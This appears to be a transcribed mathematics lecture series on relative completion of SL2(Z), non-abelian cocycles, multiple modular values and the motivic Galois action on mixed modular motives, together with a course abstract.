Non-abelian cocycles: Z^1(gamma, U11 de Rham). I explained last time how a splitting of G as a semi-direct product gives us cocycles, and therefore the automorphism group is going to act on the space of cocycles. How does it act? If we start off with a non-abelian cocycle c, then (b, phi) is going to transform c and give us a new cocycle. So we take a non-abelian cocycle and transform it to get a new one, and the new cocycle is: if the old cocycle is the map g goes to c_g, then the new cocycle is g goes to b slash g, times phi of c_g, times b inverse — this is c prime of g. So this is how the group of automorphisms acts on cocycles, and it is a very easy but quite nice exercise to check that this operation indeed preserves the cocycle equations (a sketch of the check is written out just after this paragraph). One way to think about this, which I think is the most enlightening, is that the space of non-abelian cocycles is a total space over a base, the base being the set of non-abelian cohomology classes, i.e. equivalence classes of cocycles. And one useful way to think of this action is that the element phi gives an automorphism of the cohomology class, while the element b twists the representative of the cocycle within that cohomology class. That explains the dual nature of this automorphism: phi changes the point in the base, and then b selects a point in the fiber. So we see immediately that this group — thought of as acting on multiple modular values — respects the relations between multiple modular values, at least those that come from the cocycle equations. So perhaps, since I have a tiny bit of time, let me sneak in how this acts on an example of a cocycle, because I think it is very enlightening. Last time we computed the cocycle of an Eisenstein series — and I hope I got my normalizations the same as last time; if not, I apologize. This cocycle was obtained by integrating an Eisenstein series from zero to infinity, and it was 2 pi i times some rational cocycle, which I defined explicitly, plus some constant times an odd zeta value divided by (2 pi i) to the 2n, times a coboundary. I explained last time that, in some sense, the first piece is rational — 2 pi i times rational — while the second piece is a coboundary and is transcendental. I also explained that the cohomology class of this cocycle is just the first piece — the coboundary part is zero in cohomology — and that is consistent with the Manin–Drinfeld theorem: this should be a rational cohomology class. Another way to say it is that this comes from a Tate motive, so its period should just be 2 pi i times a rational number. But it has a non-trivial transcendental part, which is a coboundary. So if we unravel this formula: the motivic Galois group is going to act on these cocycles, and what it does is act on all the generators e and f — in this example we won't see that at all, because to lowest order phi is always the identity — and then it modifies the cocycle by a coboundary. So if you take the coefficient of e_{2n+2} in this, what you find is that the rational cocycle stays put — the same thing comes in here — and then you get plus b slash g minus b, which is the addition of a coboundary. So what (b, phi) does is modify this cocycle by a coboundary.
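Before continuing with the example, here is the 'nice exercise' mentioned above, written out as a sketch under the right-action conventions of this lecture (so that $c_{gh}=c_g|_h\,c_h$, the action is by group automorphisms, and $\varphi$ is equivariant for it):

\begin{align*}
c'_{gh} &= b\big|_{gh}\,\varphi(c_{gh})\,b^{-1}
        = b\big|_{gh}\,\varphi\big(c_g\big|_h\big)\,\varphi(c_h)\,b^{-1},\\
c'_g\big|_h\, c'_h &= \Big(b\big|_g\,\varphi(c_g)\,b^{-1}\Big)\Big|_h\ b\big|_h\,\varphi(c_h)\,b^{-1}
        = b\big|_{gh}\,\varphi(c_g)\big|_h\,\varphi(c_h)\,b^{-1},
\end{align*}
and the two right-hand sides agree because $\varphi\big(c_g|_h\big)=\varphi(c_g)|_h$ by equivariance; so $c'$ is again a cocycle.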
Concretely, in the Eisenstein example, it takes this cocycle and, when you compute c prime, it is the same thing plus a coboundary: c prime equals c plus some constant times 2 pi i times the coboundary of y to the 2n. And dually you can interpret that as an action of the motivic Galois group on the odd zeta value: it is equivalent to saying that the motivic Galois group transforms the odd zeta value by adding to it some multiple of (2 pi i) to the 2n plus 1. And as we know — or as you might know from my other lectures — this is indeed how the Betti motivic Galois group acts on motivic multiple zeta values. So in some sense the fact that the cocycle of an Eisenstein series has this transcendental term in it is really fundamental, because it reflects the first non-trivial piece of the action of the motivic Galois group. Right, so now let me retranslate all of this. These are groups of automorphisms acting on groups; it is simpler to think in terms of Lie algebras — so, a Lie algebra reformulation. Let g11 be the Lie algebra of G11 de Rham — I am tempted to drop the de Rham labels because they get a bit tedious, but let's keep them — let u11 be the Lie algebra of the unipotent radical of the relative completion, and let u_H be the Lie algebra of the unipotent radical of this Galois group. Then, if we translate all the above into Lie algebras, we get an action of the Lie algebra u de Rham of H on the Lie algebra of relative completion in the following extremely specific way: having chosen a splitting as before, it maps to the semi-direct product of u11 de Rham with the SL2-equivariant derivations of this Lie algebra. So, given an element sigma, it will always manifest itself in the very specific form of a pair (b, delta), where the equivalence relation on these pairs is that (b, delta) is equivalent to (b plus a, delta minus the adjoint of a) for any a in the SL2-invariant part of u11. Now, this equivalence relation should not frighten you, because, as we see from this picture here, there are actually not very many SL2-invariant elements in this Lie algebra: you have to take quite complicated commutators before you even see the first invariant element. So we can really ignore this as a first approximation; and, as I will explain, we can also treat the deltas as negligible to a first approximation, so the motivic elements can really be thought of, to first order, in terms of just an element of this Lie algebra, which we understand fairly well. [Sorry — the sigma on the left?] Oh, sigma is some element in here, an element of the Lie algebra of automorphisms of this category. [But it doesn't appear in the image.] No, you're right, it should depend on sigma — b sigma, delta sigma — the b and the delta depend on sigma; I am just saying that, given a sigma, let me call its image (b, delta). And the image — there was also this inertia condition — lands in the subspace of derivations satisfying the Lie algebra version of that condition, which is: bracket of b with N, plus delta of N, equals zero. This is the inertia condition, where N is the logarithm of (T, kappa plus). And I claim that we can write this down more or less explicitly.
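In symbols — with the same caveat about signs and side conventions as before — the Lie-algebra version of the statement is:

\[
\sigma\ \longmapsto\ (b_\sigma,\delta_\sigma)\ \in\ \Big(\mathfrak{u}_{1,1}^{dR}\rtimes \mathrm{Der}^{\mathrm{SL}_2}\!\big(\mathfrak{u}_{1,1}^{dR}\big)\Big)\Big/\!\sim,
\qquad
(b,\delta)\sim\big(b+a,\ \delta-\mathrm{ad}(a)\big),\ \ a\in\big(\mathfrak{u}_{1,1}^{dR}\big)^{\mathrm{SL}_2},
\]
subject to the inertia condition
\[
[b,N]+\delta(N)=0,\qquad N=\log\big(\kappa(\gamma_0)\big).
\]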
N is something like — I actually didn't prepare this again — a sum of e_{2n+2} x^{2n} with some Bernoulli number factor here and some coefficient. So N, to lowest order, is a power series involving all the Eisenstein generators, with Bernoulli number coefficients coming in. So this element N is something quite concrete, and we know a lot about it. We therefore have a Lie algebra of derivations that respect this condition; it is something very concrete — you could put it on a computer if you like and explore it. Now define U_MMM — respectively its Lie algebra u_MMM — to be the image of U_H. So U_H we've got; what is U_MMM? Another way to think about it is that u_MMM is the Lie algebra of the unipotent radical of Aut-tensor of MMM with respect to the fiber functor omega de Rham. The category of mixed modular motives, as I defined it earlier, is a Tannakian category; it is completely determined by its Galois group, and this is that group's unipotent radical. So this beast completely describes all the extensions — well, it describes everything about the category, but in particular it gives us all the information about extensions and iterated extensions in the category MMM gamma. The holy grail is to get a presentation — to write down generators and relations — for this Lie algebra. If we knew that, then we would know exactly the structure of the category of mixed modular motives. So that is exactly what I am going to try to do now. First I want to explain, on this geometric picture, what the constraint is. The upshot of this is that every motivic element of u_MMM can always be represented by a pair (b, delta) — as Kathy pointed out, I should keep the dependence on sigma, but I'm lazy. We call b sigma the geometric part and delta sigma the arithmetic part; no deep reasons for these names. So let's draw a picture. In the same spirit, we can draw a picture of the derivation algebra of this Lie algebra; I'll put it up here. If a Lie algebra has a mixed Hodge structure, then its derivation algebra also has a mixed Hodge structure; in other words, the derivation algebra of this is an object of the category H. And if we draw a picture of it with the M and W filtrations, then we have this line M equals W — that is the line in red on this picture. Given any motivic element, if I want to ask what the possible elements of a given type, of a given weight, look like — they will be in a certain M column, a fixed M column — they look like this. We have the delta part: the delta part is SL2-equivariant, and as I mentioned earlier, if you are SL2-equivariant you have to lie on the diagonal, so the delta part — the arithmetic part — sits entirely in this slot here. Then we have all this stuff here, which is ad of b. What I should say is that when I write an element like this I am really choosing a splitting of the W filtration, but the intuition is fine. The top part, which is canonical, is called the geometric head. Then there is all this stuff given by b, just given by an element of the Lie algebra u; then there is an arithmetic part, which is slightly mysterious; and then there is all the rest, an infinite tail that goes down in the W filtration. So that is the picture of a motivic Lie algebra element.
And I emphasize: to draw this picture, what it implicitly means is that we have split the W and M filtrations — but that's fine, as I explained earlier. So now it gets fun, because we have all these filtrations and all these constraints, and we can do some detective work on which derivations there can be. The first point is that the inertia condition implies a whole bunch of things, but two of them are very important. The first is that the geometric head — the bit up there — is always a lowest weight vector. That already places a strong constraint on which derivations are possible. Here we see we could have an element sigma whose geometric head is this gadget here — and in fact there is such a one, it exists, and it corresponds to the zeta(3) extension we saw earlier. You could ask whether there is a derivation whose geometric head is this element here; it turns out there can be no such element. And so on and so forth. The other fact that the inertia condition gives is that the infinite tail is uniquely determined: once you know what the element looks like above the diagonal, you know all the rest. That is determined by the inertia condition, bracket of b with N plus delta of N equals zero. All right, so at last I can state a theorem about what we know about these derivations. Oh — sorry, I missed a key point, and I am slightly out of time, so I will just get to the punch line. The point is that an element sigma in the abelianization of u_MMM is equivalent to extensions in the category MMM of SL2(Z). So we really, desperately want to know exactly which derivations are possible, because that tells us how to construct extensions, which is an important problem. And to exhibit — I won't explain the machine — to construct such a non-trivial element, the key point is that you have to compute a period, a period which is essentially a regulator. That is an analytic argument, and it enables you to deduce that some element actually exists, that its image is non-zero. There is a whole machine to do that. The conclusion, then, is theorem one: there exist — and these elements are non-canonical; only their abelianizations are canonical — first of all, zeta elements. I call these sigma_{2n+1}, in u_MMM, for all n, and they carry a Hodge structure: they are of type Q(2n+1). What do they look like? They have geometric head minus 2 over (2n) factorial times the Eisenstein generator times y to the 2n, plus dot dot dot — so there is a geometric part, and we know the next term, I think; essentially nearly all of it, in any case. Then there is an arithmetic part, and then an infinite tail. The arithmetic part I actually know to first order — I know how it acts on this algebra — and it is extremely interesting: somewhat bizarrely, it involves a quotient of two different Bernoulli numbers. These elements correspond to zeta(2n+1). Another way to say it is that, in the category MMM, they correspond to extensions of the trivial Tate motive by Q(2n+1). So it shows that these extensions exist in the category MMM and, equivalently, that the odd zeta values appear as multiple modular values. And the proof — we nearly did it: the proof is obtained by computing an integral of an Eisenstein series, which produced, in the coboundary part, exactly this odd zeta value; and that, via the machine, shows that these derivations exist and are non-trivial.
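Schematically, and with the normalisation of the leading coefficient taken from the board (so it should be treated as indicative rather than definitive), the zeta elements have the shape

\[
\sigma_{2n+1}\ =\ \Big(\underbrace{-\tfrac{2}{(2n)!}\,\mathsf{e}_{2n+2}\,\mathbf{y}^{2n}+\cdots}_{\text{geometric part }b_\sigma}\ ,\ \underbrace{\delta_\sigma}_{\text{arithmetic part}}\Big),
\]
whose non-vanishing corresponds to a non-trivial class in $\mathrm{Ext}^1_{\mathsf{MMM}}\big(\mathbb{Q}(0),\mathbb{Q}(2n+1)\big)$, i.e. to the appearance of $\zeta(2n+1)$ among the multiple modular values.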
Then there is something completely new: the modular elements. They come in pairs, for every cusp form f — recall that we fixed a basis of cusp forms with rational coefficients — and for every integer d greater than or equal to the weight of f. What do they look like? Let me just write down the one with a single prime; the double-primed one is identical. The geometric part is a sum, with perfectly computable coefficients, of commutators: e_f prime times y to some power, bracketed with an Eisenstein generator times y to some other power, times x1 y2 — this is the notation I mentioned in an earlier lecture — raised to some power, plus dot dot dot. So the geometric head is a commutator of a cusp form generator with Eisenstein generators; you get a whole bunch of them, and the coefficients that occur are the coefficients that turn up in the period polynomial of f. These elements are non-trivial, and they correspond to the L-values L(f, d). So these derivations are of modular type, and they prove that there are non-trivial extensions in MMM of Q by V_f(d), for sufficiently large d bigger than the weight. The proof of that is Rankin–Selberg, or a variant of Rankin–Selberg. On the other hand, there are no possible derivation elements that have just a cusp form as their geometric head: there do not exist elements with a geometric head of the form e_f prime or e_f double prime times y to the 2n. That has a lot of important consequences, but I'll skip them. Okay, then theorem two, which is an analogue of the Deligne–Ihara conjecture for P1 minus 3 points, is that we can deduce freeness: the zeta elements and the modular elements generate a free Lie subalgebra. This is great, because the corollary is that there exists a huge supply of mixed modular motives — essentially, motives of mixed modular type. It says that if you specify arbitrary extension data, then you can construct at least one example of a mixed modular motive, an iterated multi-extension, with whatever extension data you like. There are some caveats, but it basically says that the category of mixed modular motives is doing what it should: it is generating every example that we can hope to find. Which leads me on to my next question: can we expect to find all the extensions predicted by Beilinson's conjecture? The point is that the story should not just stop here: there should not only be zeta and modular elements, there should be a whole infinite sequence of more and more generators. In fact, we should expect to find extensions in MMM of the trivial object by symmetric powers — let me just write down the final theorem and stop. So we should get extensions of this type; certainly they should exist somewhere in nature, and the question is: do they occur in relative completion? If they can be exhibited as mixed modular motives, they should correspond to derivations sigma_v in u_MMM. And here comes the spanner: theorem three, which is very surprising — the answer is no. That was absolutely astonishing to discover. If we write the weight of each modular form f_i as 2 n_i plus 2, then define a quantity L(v) to be 2d — where d is the Tate twist here — minus the sum over k of 2 n_k plus 1.
Then if L(v) is less than minus 3 — I think it might be less than or equal to, but I have a doubt — these extensions cannot occur. This is extremely surprising. It means that if Beilinson is right and these extensions exist as motives, then in fact we cannot find them in this geometric setting, and I have no idea where in nature to find such things. The funny thing is that there is a formula, due to Carlson, that tells you the rank of this Ext group in the category of real mixed Hodge structures, so we know what the dimension of this space should be; and when this condition is satisfied, it is almost always zero. So it is very unusual to expect an extension that is ruled out by this theorem — they are very rare. There is a tiny fraction of motivic extensions that should be out there which we cannot capture using relative completion in this way, and that is a big mystery. The way such an extension can happen is when you have several modular forms whose weights are very close to each other and d is very small; then occasionally you can land in the no-go zone of this theorem. But in the generic case, when d is very large, there is absolutely enough space in this derivation algebra for them to exist, and I expect them to exist and to generate a free Lie algebra. So, the questions I raised at the beginning of the lecture: does relative completion generate all mixed modular motives? Well, the answer is yes and no. Yes, in the sense that we have these freeness theorems showing that you get pretty much everything once you have the simple extensions; but not all the simple extensions seem to be there in the first place, and that is an absolute mystery. And that is a good place to stop.
|
In the `Esquisse d'un programme', Grothendieck proposed studying the action of the absolute Galois group upon the system of profinite fundamental groups of moduli spaces of curves of genus g with n marked points. Around 1990, Ihara, Drinfeld and Deligne independently initiated the study of the unipotent completion of the fundamental group of the projective line with 3 points. It is now known to be motivic by Deligne-Goncharov and generates the category of mixed Tate motives over the integers. It is closely related to many classical objects such as polylogarithms and multiple zeta values, and has a wide range of applications from number theory to physics. In the first, geometric, half of this lecture series I will explain how to extend this theory to genus one (which generates the theory in all higher genera). The unipotent fundamental groupoid must be replaced with a notion of relative completion, studied by Hain, which defines an extremely rich system of mixed Hodge structures built out of modular forms. It is closely related to Manin's iterated Eichler integrals, the universal mixed elliptic motives of Hain and Matsumoto, and the elliptic polylogarithms of Beilinson and Levin. The question that I wish to confront is whether relative completion stands a chance of generating all mixed modular motives or not. This is equivalent to studying the action of a `motivic' Galois group upon it, and the question of geometrically constructing all generalised Rankin-Selberg extensions. In the second, elementary, half of these lectures, which will be mostly independent from the first, I will explain how the relative completion has a realisation in a new class of non-holomorphic modular forms which correspond in a certain sense to mixed motives. These functions are elementary power series in $q$ and $\overline{q}$ and $\log |q|$ whose coefficients are periods. They are closely related to the theory of modular graph functions in string theory and also intersect with the theory of mock modular forms.
|
10.5446/51000 (DOI)
|
Okay, I'll start now. So this is lecture three. I will begin with some brief reminders, a brief recap of what we did last week, and then the theme today will be to focus on periods. So the main objects in this business are a pair of affine group schemes and a comparison isomorphism between them. More precisely, we had G11 B, which is the relative completion of gamma equals SL2(Z) with respect to the natural inclusion rho into the Q-points of the algebraic group SL2. B stands for Betti. This is just the group completion that I defined in the first lecture, but it has an interpretation in terms of local systems, as I explained in the second lecture. Okay, so this is an affine group scheme — a pro-algebraic matrix group, a projective limit of algebraic matrix groups over Q — and it is equipped with a Zariski-dense homomorphism, which I didn't give a name, but say rho-tilde, from gamma into its rational points. So we think of this group as some sort of algebraic envelope of SL2(Z). Of course, an affine group scheme is determined by its affine ring, which is simply a commutative Hopf algebra. Okay, so then the other group in the game is the de Rham relative completion, which I defined in terms of algebraic vector bundles with an integrable connection on M11, satisfying some conditions. Again, it is an affine group scheme over Q, so once again it is given by a commutative Hopf algebra. These two things are related as follows: there is a canonical isomorphism that I called comp, which, after extending scalars to C, is an isomorphism between these two group schemes. So the two group schemes become isomorphic after extending scalars. Then we know something more about their structure, by the definition of relative completion: in both cases we have an exact sequence — they are extensions of the algebraic group SL2 by something pro-unipotent, in other words by a projective limit of unipotent matrix groups. A unipotent group can always be represented by a subgroup of the group of upper triangular matrices with ones on the diagonal and the rest above the diagonal, and here we take a projective limit of these things. So here I've written SL2 B and SL2 dR. This can be confusing, but it actually clarifies things considerably: in both cases it is just SL2 — SL2 Betti and SL2 de Rham are just the group SL2, and the index is only there to keep track of where we are working. The reason is that the comparison, which sends SL2 Betti to SL2 de Rham, is non-trivial, so it is very useful to keep track of which copy we are working with. It also says that the comparison respects this decomposition: comp maps U11 isomorphically onto U11, etc. And finally, we know something about the general shape of these groups. The easiest way to write this down is to define little u to be the Lie algebra of the unipotent radical of the de Rham part. Then this is isomorphic to the completion of a free Lie algebra on generators coming from modular forms. Last time I called them — there were generators corresponding to Eisenstein series, each coming with a copy of the symmetric power Sym 2n of the standard representation of SL2, which has rank 2n plus 1; and for each cusp form there is a two-dimensional space of such representations.
So if you choose a basis, you've got two generators for every cusp form of weight 2n+2, and the Eisenstein generators correspond to Eisenstein series of weight 2n+2, for n greater than or equal to 1. Right, so these generators are not canonical — that is important to emphasize. Okay, so this lecture is going to be entirely about trying to understand this isomorphism comp, and that is going to give some interesting numbers. So the definition: the ring of multiple modular values. I am not entirely sure how to denote these — sometimes I write MMV gamma, and I have possibly written Z gamma in one place or another. This is a ring of numbers, a subring of C: the smallest Q-subalgebra of C over which the comparison map is defined. Otherwise said, it is the ring generated by all the numbers that turn up in the comparison map. Maybe a more satisfying way to say it: the comparison map induces a map on the affine rings going in the opposite direction; if you take an element in the affine ring of the de Rham group and apply the comparison map on the level of affine rings, then certain coefficients appear, and MMV gamma is the ring generated by all those coefficients. Okay, so this ring does not have a canonical basis in any way; for now it is just a ring, and what I want to do is dig down into it and try to understand as much as we can about it. So the first thing we can do, by the first point, is use the fact that gamma is Zariski-dense in the Betti relative completion. We have a map from SL2(Z) into the Q-points of the Betti relative completion, and then we can apply the comparison map, which sends us into the complex points of the de Rham relative completion — and in fact we know, by the definition of MMV gamma, that it necessarily lands in the points over MMV gamma; that is the definition, so this is true. And this map is Zariski-dense, which means these numbers are going to be generated by the images of elements of SL2(Z). Now gamma was just the topological fundamental group of M11 with respect to a tangential base point which I defined last time: d/dq, which I sometimes also call 1 at infinity; it is a unit tangent vector at the cusp. And as you all know, SL2(Z) is generated by two matrices which go by the names of S and T. These correspond to the modular transformations: S is inversion, tau maps to minus 1 over tau, and T is translation, tau maps to tau plus 1. Okay, so these elements S and T should be thought of as paths in the complex points of M11. Let's look at that. For T, it all takes place in the q-disk. If this is a picture of the q-disk — I remind you that q equals e to the 2 pi i tau — then it is punctured at the origin, and our base point was this tangent vector d/dq. So the path T can be represented as a path that goes along this tangent vector, loops once in the positive direction around the origin, and then comes back along this tangent vector. That's T: a loop around the cusp. And indeed it must be, by this formula tau goes to tau plus 1, which corresponds to winding once around the origin. So how do we think about S? Well, if this is a picture of the upper half plane, then we have the cusp up here and the tangent vector sticking down like this, and we think of S as a path from the cusp, with this initial velocity given by the tangent vector, all the way down to zero.
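For reference, the two generators and their actions on the upper half plane are the standard ones (nothing here is specific to this lecture):

\[
S=\begin{pmatrix}0&-1\\1&0\end{pmatrix}\colon\ \tau\mapsto -\tfrac{1}{\tau},
\qquad
T=\begin{pmatrix}1&1\\0&1\end{pmatrix}\colon\ \tau\mapsto \tau+1,
\qquad
q=e^{2\pi i\tau},
\]
so T fixes the cusp and corresponds to q winding once around the origin, while S exchanges the cusps 0 and infinity.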
So in fact, as a representative of S, we can just take the imaginary axis. This picture is slightly misleading, because we are working upstairs in the upper half plane; of course, on the orbifold M11 we should think of it like this: here is a picture of M11 with the cusp and a tangent vector sticking out, and then S is indeed a loop, because the point zero is equivalent to the cusp infinity. So we should think of S as some sort of path in M11, but when we work on the upper half plane we shall think of it as a path between zero and infinity. Okay, so because SL2(Z) is Zariski-dense and is generated by S and T, it turns out, as we shall see, that the ring of multiple modular values is generated as a ring by the coefficients of the images of T and S. By that I mean: we have these matrices T and S in SL2(Z), their images are elements of this group, and the coefficients are certain numbers. It turns out that the coefficients of T are very uninteresting — just powers of 2 pi i — although the element T itself is very important. So all the information is contained in this single element S; that's the interesting part. Before proceeding with this, let me give something more familiar, because by now it is increasingly well known, and explain the analogue in the case of P1 minus 3 points, just so that we get our bearings. Now this case is very slightly different, because we are not looking at the fundamental group but at the groupoid: we are going to look at paths from one point to a different point. We could take paths based at a single point, in which case it would be much closer to the M11 picture, but I hesitated to do that because I think the path torsor is actually the more well-known setting. So let me explain that. On M04, the base points one takes are the tangent vector 1 at the origin and the negative unit tangent vector at the point 1 — of course these are not drawn to scale. So the topological — not fundamental group, but the set of homotopy classes of paths from this tangent vector to the other tangent vector — is what I just said: homotopy classes of paths from 0 to 1, essentially. There is one path that plays a crucial role: the so-called dch, the droit chemin, the straight path — the straight line from the tangent vector 1 at 0 to the tangent vector minus 1 at 1. It is really literally the map from the open unit interval into C minus {0, 1} along the real axis: it goes out with unit speed here and comes in with unit speed there. That is indeed a path between two tangential base points, because its initial velocity is 1 and its final velocity is minus 1 coming in. There is another path that plays a role here: you could take dch but pre-compose it with a loop around the origin — call it gamma naught: go around a loop around the origin and then go to 1. That is another example of a path. And in M11, the role of the straight line path dch is played by S and the role of this little loop is played by T. So in this setting we work with unipotent completion: the Betti torsor of paths from 0 to 1 is the unipotent completion, and there is the de Rham version of the same thing. This can be described quite explicitly; let me put them over here.
So O of pi1 Betti is the affine ring of a scheme over Q, and for R a commutative Q-algebra its R-points are given by the set of group-like formal power series: invertible power series in two non-commuting variables satisfying an algebraic condition — I wrote this down in the first lecture, I think. Group-like means that the coproduct satisfies delta of S equals S tensor S, where the coproduct is the one for which the generators are primitive: delta of x_i equals 1 tensor x_i plus x_i tensor 1. And the affine ring of the de Rham torsor of paths is really the Q-vector space generated by words in two non-commuting letters e0 and e1, where e0 corresponds to the differential form dx over x and e1 corresponds to dx over 1 minus x. I don't want to give an entire course on P1 minus 3 points, but this is just to fix ideas and to have a concrete analogy. In this setting we have a very, very similar setup: the topological fundamental groupoid — the space of homotopy classes of paths — maps into the Betti torsor of paths, more precisely into its rational points, and then we have a comparison isomorphism. Here I forgot to say: exactly as before, we have the affine rings O pi1 and a comparison isomorphism, and this goes into the complex points of the de Rham torsor. It is the exact analogue of what I mentioned earlier, and what it does is take this straight line path, dch, and send it to something over here which is very famous: the Drinfeld associator. Concretely, the Drinfeld associator can be written down, at least formally: it is a formal power series indexed by words in e0, e1, where the coefficient of each word is what is called a shuffle-regularized multiple zeta value. It is a formal power series in the two letters e0, e1, and we know what it looks like: it starts off 1 plus zeta(2) times (e0 e1 minus e1 e0), depending on certain sign conventions, and so on — it goes on forever and can be viewed as the generating series of multiple zeta values (I'll write out a quick check of this first coefficient just after this paragraph). So, after that long digression, I hope that motivates exactly what is going on in this picture for M11. We've got exactly the same situation, with the small difference that we've got the fundamental group with respect to a base point and not a torsor of paths — in that respect it is simpler. So the element T — or rather the image of the element T over here — is really the same element as this gamma zero here: it is just a loop around the origin. So T only produces powers of 2 pi i, but it is very important — I'll just say this because I might not have time to explain it: it is some kind of non-abelian analogue of the Petersson inner product on modular forms. And in principle its image can be determined completely; it can be computed completely. The element S, on the other hand, we should think of as the analogue of the Drinfeld associator for M11 — in fact they are related in some way. In the same way that the coefficients of the Drinfeld associator generate multiple zeta values, the coefficients of this gadget generate multiple modular values; but it is a much, much richer and more complicated beast than the Drinfeld associator. So now I want to explain relations between these numbers; as I progress it will become more and more concrete. For the Drinfeld associator it is well known that it satisfies the associator relations, namely the hexagon and pentagon relations, and I want to write down an analogue of that for M11. These are cocycle relations. So we had this exact sequence, with pro-unipotent radical, where the dot is either the Betti or the de Rham relative completion.
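Returning briefly to the Drinfeld associator mentioned just above, here is a quick sanity check on its first non-trivial coefficient; sign and ordering conventions vary, so the assignment of the word e0 e1 versus e1 e0 should be taken with a grain of salt:

\[
\int_{0<t_1<t_2<1}\frac{dt_1}{1-t_1}\,\frac{dt_2}{t_2}
\;=\;\int_0^1\frac{-\log(1-t_2)}{t_2}\,dt_2
\;=\;\sum_{n\geq 1}\frac{1}{n^{2}}
\;=\;\zeta(2),
\]
which is the multiple zeta value appearing as the coefficient of the commutator $[e_0,e_1]=e_0e_1-e_1e_0$ in the expansion written above.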
In particular, the comparison isomorphism restricts to — or induces — a comparison between these copies of SL_2. Let me write that down explicitly and dispense with it. SL_2^B, as I mentioned before, is just SL_2 — the B is just a label — and the same for SL_2^{dR}, which is also just a copy of SL_2; but the isomorphism between them is non-trivial. On the level of points, it takes a matrix (a, b; c, d) to another matrix, which I'll call gamma bar, multiplying b by 2 pi i and c by (2 pi i)^{-1}. This is a minor detail that can be ignored as a first approximation, but it's very irritating: if you don't distinguish the Betti and de Rham copies of SL_2, you get yourself into a pickle, so it's important to bear it in mind. The reason for it will become clear when I talk about the underlying Hodge structure: fundamentally, this SL_2 acts on the H^1 of the Tate elliptic curve, and that H^1 is a copy of Q(0) plus Q(-1), and that explains the 2 pi i sneaking in. Okay, so now to proceed we have to choose a splitting of one of these short exact sequences. [Question from the audience about the SL_2 part.] So this is on points: what I've done is write it down on complex points — here this is a point of SL_2^B(C) and I've written down its image in SL_2^{dR}(C). This is a product of schemes, and to write it down properly you could write down what it is on the affine ring, but I've just written it on points. So now let's choose a splitting of the de Rham exact sequence. This is possible on the level of points by Levi's theorem, or a version of it: you can always split such a short exact sequence of algebraic groups on the level of points, and on the level of actual group schemes this is a theorem due to Mostow. So we look at this exact sequence and choose a splitting, which means we write G_{1,1}^{dR} as isomorphic to SL_2^{dR} semi-direct U_{1,1}^{dR}, where SL_2 acts on the right on U_{1,1}^{dR}. This splitting is non-canonical; it depends on some choices, unfortunately — I do not believe there is a canonical such splitting. Okay, so now we do the same thing and rewrite this map. We had Gamma = SL_2(Z) going into the rational points of G_{1,1}^B; by the comparison, this gives a map into the complex points of G^{dR}; and then, having chosen our splitting, it lands in the complex points of this semi-direct product. What that does is take a matrix gamma in Gamma and map it to, in the first component, gamma bar — essentially the same matrix gamma, but with these irritating 2 pi i's creeping in — and something else that I'm going to call C_gamma. And of course, the ring of multiple modular values is generated by the coefficients of the C_gamma for all elements gamma in the group SL_2(Z). This map is a homomorphism, and that is equivalent — it's a one-line calculation — to the equation C_{gh} = C_g|_h · C_h, where this slash is my notation, or the standard notation, for a right action, and the multiplication takes place in U. This holds for all g, h in Gamma. So this is an equation which defines a non-abelian group cocycle, and as a result it gives quadratic relations between the coefficients of these elements. So let me briefly remind you of some notation concerning non-abelian group cohomology.
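In symbols, the maps described in this paragraph are as follows (the splitting in the second display is the non-canonical choice just mentioned, and the action in the cocycle relation is via the de Rham image h bar):

\[
\mathrm{SL}_2^{B}(\mathbb{C})\ \xrightarrow{\ \sim\ }\ \mathrm{SL}_2^{dR}(\mathbb{C}),\qquad
\gamma=\begin{pmatrix}a&b\\ c&d\end{pmatrix}\ \longmapsto\ \bar{\gamma}=\begin{pmatrix}a& 2\pi i\,b\\ (2\pi i)^{-1}c& d\end{pmatrix},
\]
\[
\Gamma=\mathrm{SL}_2(\mathbb{Z})\ \longrightarrow\ \mathcal{G}_{1,1}^{dR}(\mathbb{C})\ \cong\ \mathrm{SL}_2^{dR}(\mathbb{C})\ltimes\ \mathcal{U}_{1,1}^{dR}(\mathbb{C}),\qquad
\gamma\ \longmapsto\ (\bar{\gamma},\ \mathcal{C}_{\gamma}),\qquad
\mathcal{C}_{gh}=\mathcal{C}_{g}\big|_{\bar h}\ \mathcal{C}_{h}.
\]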
This next bit is a digression. If we have a group G — any old group G — acting on a group A (in my notes it's called A, stupidly; it's not necessarily abelian — say a group scheme, for example), then the set of cocycles Z^1(G, A), the set of non-abelian cocycles, is the set of maps c from G into A satisfying precisely this equation. Here my actions are on the right; for a left action the formulae are very slightly different. So: such that c_{gh} = c_g|_h c_h. That's the definition of a non-abelian group cocycle. And there's an equivalence relation on these. This is a set — unlike group cocycles with values in an abelian group, there's no group structure here — just a set containing a distinguished element, the trivial cocycle sending every element of G to 1. So it's a pointed set, and on that pointed set there's an equivalence relation: we say that two non-abelian cocycles are equivalent if they differ by a coboundary, which means there exists an element b in A such that c'_g = (b^{-1})|_g c_g b for all g in G. If I didn't mess up the formula, you can check that any c' defined in this manner, by twisting by an element b, indeed satisfies the cocycle equation. That's an equivalence relation, and we say that something is a coboundary if it's equivalent to the trivial cocycle; in that case it would be the cocycle g maps to (b^{-1})|_g b for some b. — It's indeed a group action of A on the right? — Exactly, yes. Absolutely. And then, as you say, H^1 is the quotient, modulo this equivalence relation; I won't use it so much this time. We think of H^1 as a base and Z^1 as a total space over it, and the fibres, as you say, admit an A-action; that's a good way to think about it. And the final remark I want to make, which is very well known, is that this space of cocycles can be interpreted simply as a Hom — in fact I've already used it up here: Z^1(G, A) is canonically in bijection with the group homomorphisms from G into the semi-direct product of G with A which are the identity on G. So these are maps g goes to (g, something), and the "something" defines the cocycle. We've already used this to define the cocycle we're interested in; it's a very easy thing to prove. Okay, so by this final remark, the non-abelian cocycles are simply homomorphisms of groups, and since we have a presentation of SL_2(Z), we can explicitly write down all the equations — the necessary and sufficient equations — for C to be a group cocycle. The first remark is that minus the identity in Gamma acts trivially, and it's very easy to show that this implies that the cocycle evaluated on minus the identity is trivial. This is also related to the fact that the local chart on M_{1,1} was the stack quotient of the punctured disc by plus or minus 1, and to the fact that there are no modular forms of odd weight for SL_2(Z) — different ways of thinking about the same fact; but C of minus the identity is 1 in this business. That means we've really got a cocycle of Gamma modulo plus or minus 1, also known as PSL_2(Z). And this has a presentation: the image of S in this quotient satisfies S squared equals 1.
